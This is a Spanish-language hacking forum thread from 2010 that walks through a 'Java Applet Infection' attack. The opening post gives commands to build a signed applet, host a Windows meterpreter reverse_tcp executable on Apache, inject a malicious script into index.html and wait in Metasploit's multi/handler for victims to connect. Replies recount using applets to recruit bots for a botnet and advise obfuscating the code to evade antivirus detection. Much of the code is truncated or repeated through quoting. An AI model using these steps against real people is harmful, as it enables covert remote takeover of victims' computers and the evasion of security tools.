Título: [Metasploit] Java Applet Infection Publicado por: Shell Root en 19 Enero 2010, 02:48 am [Metasploit] Java Applet Infection (http://www.tequilavalley.com/wp-content/uploads/2009/06/java.png) [Metasploit By: trashhgoo & Shell Root] Está infeccion permite la ejecución de codigo remoto, por medio del navegador. Para lograr nuestro objetivo, necesitamos tener instalado dentro de nuestro P.C, algunos componentes necesarios para la compilación y ejecución de alguns archivos. Primero instalaremos el JDK de JAVA para la compilacion del codigo en JAVA para la ejecución del codigo remoto. Código: shellroot@ShellRoot-desktop:~$ sudo apt-get install sun-java6-jdk Tambien es necesario la instalacion del Apache2 Código: shellroot@ShellRoot-desktop:~$ sudo apt-get install apache2 Ahora para que nos quede organizado y no, se nos pierdan archivos, crearemos una carpeta dentro de la carpeta personal. (/home/shellroot/) Código: shellroot@ShellRoot-desktop:~$ mkdir JavaAppletInfect Nos movemos a la carpeta que acabamos de crear y bajamos el siguiente archivo http://spl0it.org/files/makeapplet.sh, no sin antes guardar el siguiente codigo como MSFcmd.java Código Ahora estamos listos para descargar y ejecutar el archivo makeapplet.sh. Así: Código: shellroot@shellroot-desktop:~/JavaAppletInfect$ wget http://spl0it.org/files/makeapplet.sh && chmod a+x ./makeapplet.sh Despues de ello, nos perdia una información para configurar nuestro certificado. Llenamos la informacion como queramos y al finalizar correctamente, se crearán los certificados del Script. Código: Enter the name of the applet without the extension: Ahora tenemos que copiar los archivos SignedMSFcmd.Jar y MSFcmd.Class dentro de la carpeta /var/www, despues de ello, iniciamos el Serividor Apache. Así: Código: shellroot@shellroot-desktop:~/JavaAppletInfect$ sudo cp SignedMSFcmd.jar /var/www Despues de realizar todo lo anterior, precedemos a realizar un ejecutable con un PAYLOAD en este caso usaré windows/meterpreter/reverse_tcp Código: shellroot@shellroot-desktop:~$ cd msf3 Movemos el ejecutable dentro de la carpeta /var/www y configuramos los permisos del archivo. Código: shellroot@shellroot-desktop:~/msf3$ sudo cp ./MSFcmd.exe /var/www/ Ahora el archivo (index.html) que se encuentra dentro de la carpeta /var/www, modificamos el contenido y le añadimos el Script Malicioso. Así: Código
Ahora ingresamos a la Consola del Metasploit, y usamos el Auxiliar multi/handler, ingresamos los datos del PAYLOAD anterior con los mismo datos, y ejecutamos el exploit en segundo plano. Así: Código: shellroot@shellroot-desktop:~/msf3$ ./msfconsole y esperamos a que alguien ingrese a la URL, para recibir la Session del Meterpreter. PD: La victima al ejecutar se le mostratá el siguiente certificado Web. :D (http://img682.imageshack.us/img682/4756/jeqrozg7.png) (http://img682.imageshack.us/i/jeqrozg7.png/) Gr3tz: Rcart, Messerschmitt, Xzite Mirando los tipos de infecciones que se pueden realizar para Inyectar un PAYLOAD, encontré un Papper de AnalyseR, publicado por Hacker_Zero, Mirad. (http://foro.elhacker.net/hacking_avanzado/poc_infeccion_mediante_java_applet_y_vbscript-t240306.0.html). Pero mirando el MSFUnleashed, me di cuenta que era el mismo tipo de infección, Mirad (http://www.offensive-security.com/metasploit-unleashed/Java-Applet-Infection-Method) así que no se quien es... :·P, igual no me importa... x·D Título: Re: [Metasploit] Java Applet Infection Publicado por: pUzzLe en 21 Enero 2010, 16:10 pm En este caso la "victima" se conectaría a nosotros, si no me equivoco.
Gracias por el tuto, otro más para imprimir :laugh: Saludos. Título: Re: [Metasploit] Java Applet Infection Publicado por: Debci en 21 Enero 2010, 18:06 pm Señores, no es un espejismo, no e sun pájaro, es shell root con la manera mas increible que he visto de conseguir una shell...
Madre mia esto vale oro.... Saludos Título: Re: [Metasploit] Java Applet Infection Publicado por: Shell Root en 21 Enero 2010, 18:24 pm Señores, no es un espejismo, no e sun pájaro, es shell root con la manera mas increible que he visto de conseguir una shell... jejejeMadre mia esto vale oro... Joder, esto me tomo más de 1 Semana en ponerlo en practica! Proximamente: Fast-Track And SET (Social Engineering Toolkit) Título: Re: [Metasploit] Java Applet Infection Publicado por: Debci en 21 Enero 2010, 21:37 pm Señores, no es un espejismo, no e sun pájaro, es shell root con la manera mas increible que he visto de conseguir una shell... jejejeMadre mia esto vale oro... Joder, esto me tomo más de 1 Semana en ponerlo en practica! Proximamente: Fast-Track And SET (Social Engineering Toolkit) Saludos Título: Re: [Metasploit] Java Applet Infection Publicado por: S1dD3xt35 en 21 Enero 2010, 23:51 pm son geniales tus post :-( de lo mejor ahora a practicar gracias :D ;-)
Título: Re: [Metasploit] Java Applet Infection Publicado por: alexkof158 en 30 Enero 2010, 01:30 am esto se podria hacer en wan? osea tendria que abrir puertos y configurar un servidor apache en mi pc??
Saludos Título: Re: [Metasploit] Java Applet Infection Publicado por: [L]ord [R]NA en 30 Enero 2010, 02:43 am esto se podria hacer en wan? osea tendria que abrir puertos y configurar un servidor apache en mi pc?? Saludos No veo porque no sea posible. Título: Re: [Metasploit] Java Applet Infection Publicado por: EgoPL en 30 Enero 2010, 23:38 pm Muy bueno que hayan portado este método a metasploit, yo hace años usaba applets para conseguir bots.
Ponía algo interesante como juegos, reproductores de música etc y la gente al meterse y aceptar los permisos además de jugar al juego estaban descargando el bot, ejecutándolo y pasando a formar parte de la botnet. Título: Re: [Metasploit] Java Applet Infection Publicado por: alexkof158 en 31 Enero 2010, 01:36 am esto se podria hacer en wan? osea tendria que abrir puertos y configurar un servidor apache en mi pc?? Saludos No veo porque no sea posible. Título: Re: [Metasploit] Java Applet Infection Publicado por: tragantras en 1 Febrero 2010, 15:50 pm muy buen post Shell Root. Por qué no te anímas y haces una recolección de todos tus posts abiertos? Estaría muy interesante a la larga contar con todos ellos reunidos ^^
Un saludo! Título: Re: [Metasploit] Java Applet Infection Publicado por: Asphyxia en 1 Febrero 2010, 17:05 pm Una E-zine
Título: Re: [Metasploit] Java Applet Infection Publicado por: Shell Root en 1 Febrero 2010, 17:34 pm muy buen post Shell Root. Por qué no te anímas y haces una recolección de todos tus posts abiertos? Estaría muy interesante a la larga contar con todos ellos reunidos ^^ El usuario ..::| D3Bć1 |::. lo está haciendo!. Bueno eso creo... :silbar:Título: Re: [Metasploit] Java Applet Infection Publicado por: tragantras en 2 Febrero 2010, 11:31 am Vale reescribo xD:
El codigo java que has puesto está mal en varias cosas.. ( ya que copias, copia bien campeón xDD ) para empezar, no es "Try" sino try, tampoco "Catch" sino "catch", es decir, esas dos palabras en minúsculas. Por otra parte: Código: f = Runtime.getRuntime().exec("first"); está mal, es: Código: f = Runtime.getRuntime().exec(first); es decir, sin las comillas, lo demás perfecto, un saludo! xD pongo aquí el codigo entero bien... ( de todas maners en los otros posts si están bien escritos ) Código: import java.applet.*; Título: Re: [Metasploit] Java Applet Infection Publicado por: Shell Root en 2 Febrero 2010, 17:29 pm :-\
Título: Re: [Metasploit] Java Applet Infection Publicado por: Debci en 5 Febrero 2010, 20:46 pm muy buen post Shell Root. Por qué no te anímas y haces una recolección de todos tus posts abiertos? Estaría muy interesante a la larga contar con todos ellos reunidos ^^ El usuario ..::| D3Bć1 |::. lo está haciendo!. Bueno eso creo... :silbar:Saludos Título: Re: [Metasploit] Java Applet Infection Publicado por: Shell Root en 5 Febrero 2010, 20:54 pm una cosa el lhost que indica? Depende del PAYLOAD seleccionado (Directo o Inverso), debes de seleccionar a que IP regresará. En otras palabras más simples...RHOST = Host Remoto LHOST = Host Local Título: Re: [Metasploit] Java Applet Infection Publicado por: alexkof158 en 10 Febrero 2010, 12:07 pm este metodo se puede llevar bajar windows xp????
Título: Re: [Metasploit] Java Applet Infection Publicado por: illera88 en 10 Febrero 2010, 14:02 pm Todo perfecto hasta este paso:
Citar root@ubuntu:/home/berto/Escritorio/JavaAppletInfect# ./makeapplet.sh Enter the name of the applet without the extension: MSFcmd MSFcmd.java:10: not a statement Try { ^ MSFcmd.java:10: ';' expected Try { ^ MSFcmd.java:12: ')' expected }Catch(IOException e) { ^ MSFcmd.java:12: illegal start of expression }Catch(IOException e) { ^ MSFcmd.java:12: ';' expected }Catch(IOException e) { ^ MSFcmd.java:17: class, interface, or enum expected } ^ 6 errors Error with javac root@ubuntu:/home/berto/Escritorio/JavaAppletInfect# Esto por que es??? Un saludo y gracias ;);) Título: Re: [Metasploit] Java Applet Infection Publicado por: Shell Root en 10 Febrero 2010, 18:45 pm este metodo se puede llevar bajar windows xp???? Por su pollo, instala el JDK de java.Esto por que es??? WTF!, donde demonios estás... xD, en que paso estás y que estás haciendo?Título: Re: [Metasploit] Java Applet Infection Publicado por: illera88 en 10 Febrero 2010, 20:40 pm este metodo se puede llevar bajar windows xp???? Por su pollo, instala el JDK de java.Esto por que es??? WTF!, donde demonios estás... xD, en que paso estás y que estás haciendo?cuando ejecuto : Citar ./makeapplet.sh Gracias shell root!!! Título: Re: [Metasploit] Java Applet Infection Publicado por: alexkof158 en 11 Febrero 2010, 02:06 am Problema para crear el certificado .jar :P
en windows como seria?? shellroot@shellroot-desktop:~/JavaAppletInfect$ ./makeapplet.sh Para Guindows ;D Código: C:\Documents and Settings\Administrador\Escritorio\JavaInfect> java makeapplet.s Saludos, Título: Re: [Metasploit] Java Applet Infection Publicado por: Shell Root en 11 Febrero 2010, 02:18 am alexkof158, jajaja pasate a linux :rolleyes:
Título: Re: [Metasploit] Java Applet Infection Publicado por: alexkof158 en 11 Febrero 2010, 02:23 am será tocara, es que linux apenas estoy dandole y alli vamos x buen camino saludos naaaaaaaaaaaaaaaaaaaaaaaaa Shell Root conectate al msn
Título: Re: [Metasploit] Java Applet Infection Publicado por: Shell Root en 11 Febrero 2010, 02:40 am Cuando no estoy en el MSN es porque ando ocupado, así que no puedo conectarme.
Momento estas ejecutando makeapplet.sh, si mal no recuerdo los .sh son extensiones para linux... Esperemos a que alguien confirme. Ahora, creo que si te vas al shell del MSF, ojo, no el msfconsole, sino la shell.bat. Mira si se puede ejecutar desde allí! Saludos! Título: Re: [Metasploit] Java Applet Infection Publicado por: 0xb4dc0d31 en 11 Febrero 2010, 03:14 am Cabe aclarar que este método es bastante viejo, aún así, en mi experiencia suelen desconfiar más de un Applet que de un ejecutable a secas... Pero bueno, en los tiempos de ahora si no aplicas "IS" no hay víctimas.
Los ficheros .sh son los scripts de la terminal (bash) de Linux, el equivalente al BATCH de Windows. Título: Re: [Metasploit] Java Applet Infection Publicado por: Shell Root en 11 Febrero 2010, 03:41 am Cabe aclarar que este método es basntante viejo, aún así, en mi experiencia suelen desconfiar más de un Applet que de un ejecutable a secas... Pero bueno,... :¬¬..., en los tiempos de ahora si no aplicas "IS" no hay víctimas. WTF!Los ficheros .sh son los scripts de la terminal (bash) de Linux, el equivalente al BATCH de Windows. Exacto, equivalente a .bat en windows :¬¬Título: Re: [Metasploit] Java Applet Infection Publicado por: 0xb4dc0d31 en 11 Febrero 2010, 03:47 am Cabe aclarar que este método es basntante viejo, aún así, en mi experiencia suelen desconfiar más de un Applet que de un ejecutable a secas... Pero bueno,... :¬¬..., en los tiempos de ahora si no aplicas "IS" no hay víctimas. WTF!Los ficheros .sh son los scripts de la terminal (bash) de Linux, el equivalente al BATCH de Windows. Exacto, equivalente a .bat en windows :¬¬IS = Ing. Social No hace falta quotearme tantas veces por lo que ya está claro, ¿verdad?, o es el afan de incrementar tu número de posts. [sarcasmo]Ah, debí incluir negritas y color remarcando "en mi experiencia"[/sarcasmo] Citar Exacto, equivalente a .bat en windows :¬¬ ¿Equivalentes o iguales?Título: Re: [Metasploit] Java Applet Infection Publicado por: rockernault en 11 Febrero 2010, 04:04 am identicos... es batch es lenguaje de scripting y los archivos son los .bat
la IS no es necesaria aqui... y segun mi experiencia, siempre caen los que no tienen cuidado con lo que hacen... los exploits no necesitan ingenieria social.. jalan porque jalan... Título: Re: [Metasploit] Java Applet Infection Publicado por: Shell Root en 11 Febrero 2010, 04:48 am ..., o es el afan de incrementar tu número de posts. Huelo un aire de envidia... :silbar:identicos... es batch es lenguaje de scripting y los archivos son los .bat Simon!la IS no es necesaria aqui... y segun mi experiencia, siempre caen los que no tienen cuidado con lo que hacen... Más que todo usuarios N00B'slos exploits no necesitan ingenieria social.. jalan porque jalan... Depende del exploit, :rolleyes: implementa el ie_aurora a ver que te sale :PTítulo: Re: [Metasploit] Java Applet Infection Publicado por: DragonFire en 11 Febrero 2010, 06:30 am tragantras
por que le dices campeon, la forma en que usas esa expresion, denota que estas gritandole al foro que eres mejor que el. Ese metodo era muy bueno en las epocas de Windows 9x, en Windows XP, medio sirve y actualmente no sirve, por que el navegador se ejeutara con permisos minimos lo que realmente no hace una infeccion real y no podria hacerla por que no tiene los privilegios para hacerlo, en ningun vista ni Windows 7 va a funcionar algo mas decente que ver un par de archivos, fuera de eso nunca podra tomar el control del PC salvo algun raro, rarisimo bufferoverflow que le ayude a escalar el privilegio y ese codigo no explota eso Título: Re: [Metasploit] Java Applet Infection Publicado por: rockernault en 11 Febrero 2010, 13:34 pm Citar Huelo un aire de envidia... si.. suele pasar cuando haces las cosas bien...."Si los perros ladran, es que vamos avanzando" en SMB2 esta el DOS cuando le llegan paquetes maliciosos al servidor smb2 y no siempre se trata de explotar vulns de SO... esta adobe, VLC, putty, tftp, cuteftp, formatos de windows en IIS del tipo asp;.jpg Karmetasploit, etc Título: Re: [Metasploit] Java Applet Infection Publicado por: Littlehorse en 11 Febrero 2010, 13:48 pm Citar y no siempre se trata de explotar vulns de SO... esta adobe, VLC, putty, tftp, cuteftp, formatos de windows en IIS del tipo asp;.jpg Karmetasploit, etc Para nada. No se trata solamente de encontrar un punto de acceso si no de ademas encontrar un fallo para poder escalar privilegios. En los últimos sistemas de Microsoft tendrías que vulnerar una aplicacion que este en el nivel de integridad al cual que desees acceder, o en su defecto, vulnerar el control de los niveles de integridad. En cuanto al método del Applet, es pura y exclusivamente ingenieria social. Por lo menos en su concepto mas general y creo que discutir eso no tiene mucho sentido ;D. Si a estas alturas del partido desconocemos el significado de ingeniería social, mal vamos :P. Un saludo! Título: Re: [Metasploit] Java Applet Infection Publicado por: rockernault en 11 Febrero 2010, 14:03 pm Citar En los últimos sistemas de Microsoft tendrías que vulnerar una aplicacion que este en el nivel de integridad al cual que desees acceder, o en su defecto, vulnerar el control de los niveles de integridad. como cual aplicacion? un servicio?? SMB?? ftp?? webserver?? si, no tiene sentido discutir la IS... Título: Re: [Metasploit] Java Applet Infection Publicado por: alexkof158 en 13 Febrero 2010, 09:50 am una simple pregunta este metodo funciona en los browsers como IE 7 , 8, and Mozilla 3.5 ????? graciassss
Saludos :laugh: Título: Re: [Metasploit] Java Applet Infection Publicado por: Shell Root en 13 Febrero 2010, 18:00 pm Simon!
Título: Re: [Metasploit] Java Applet Infection Publicado por: Debci en 20 Julio 2010, 17:26 pm Siento re-abrir post pero sigue funcionando este método? Porque estoy probando como un loco y no funciona :S
Saludos Título: Re: [Metasploit] Java Applet Infection Publicado por: [L]ord [R]NA en 20 Julio 2010, 22:00 pm Verifica las versiones vulnerables a ese error.
Título: Re: [Metasploit] Java Applet Infection Publicado por: Debci en 21 Julio 2010, 10:07 am Verifica las versiones vulnerables a ese error. Si ir va pero todos los AV detectan la pag como maliciosa xDSaludos Título: Re: [Metasploit] Java Applet Infection Publicado por: alexkof158 en 21 Julio 2010, 23:10 pm Verifica las versiones vulnerables a ese error. Si ir va pero todos los AV detectan la pag como maliciosa xDSaludos Título: Re: [Metasploit] Java Applet Infection Publicado por: Debci en 21 Julio 2010, 23:26 pm Verifica las versiones vulnerables a ese error. Si ir va pero todos los AV detectan la pag como maliciosa xDSaludos Solo con eso? podria liarlo mas xD ayudaria si lo meto en paquetes clases y mas hostias? Saludos Título: Re: [Metasploit] Java Applet Infection Publicado por: [L]ord [R]NA en 22 Julio 2010, 01:50 am Verifica las versiones vulnerables a ese error. Si ir va pero todos los AV detectan la pag como maliciosa xDSaludos Ofusca el codigo, osea, trata de hacer un codigo que realize lo mismo pero de una forma diferente, posiblemente funcione. Título: Re: [Metasploit] Java Applet Infection Publicado por: alexkof158 en 22 Julio 2010, 05:59 am Verifica las versiones vulnerables a ese error. Si ir va pero todos los AV detectan la pag como maliciosa xDSaludos Ofusca el codigo, osea, trata de hacer un codigo que realize lo mismo pero de una forma diferente, posiblemente funcione. sapto Título: Re: [Metasploit] Java Applet Infection Publicado por: Debci en 22 Julio 2010, 12:52 pm Verifica las versiones vulnerables a ese error. Si ir va pero todos los AV detectan la pag como maliciosa xDSaludos Ofusca el codigo, osea, trata de hacer un codigo que realize lo mismo pero de una forma diferente, posiblemente funcione. Saludos Título: Re: [Metasploit] Java Applet Infection Publicado por: [L]ord [R]NA en 22 Julio 2010, 21:46 pm Verifica las versiones vulnerables a ese error. Si ir va pero todos los AV detectan la pag como maliciosa xDSaludos Ofusca el codigo, osea, trata de hacer un codigo que realize lo mismo pero de una forma diferente, posiblemente funcione. Saludos |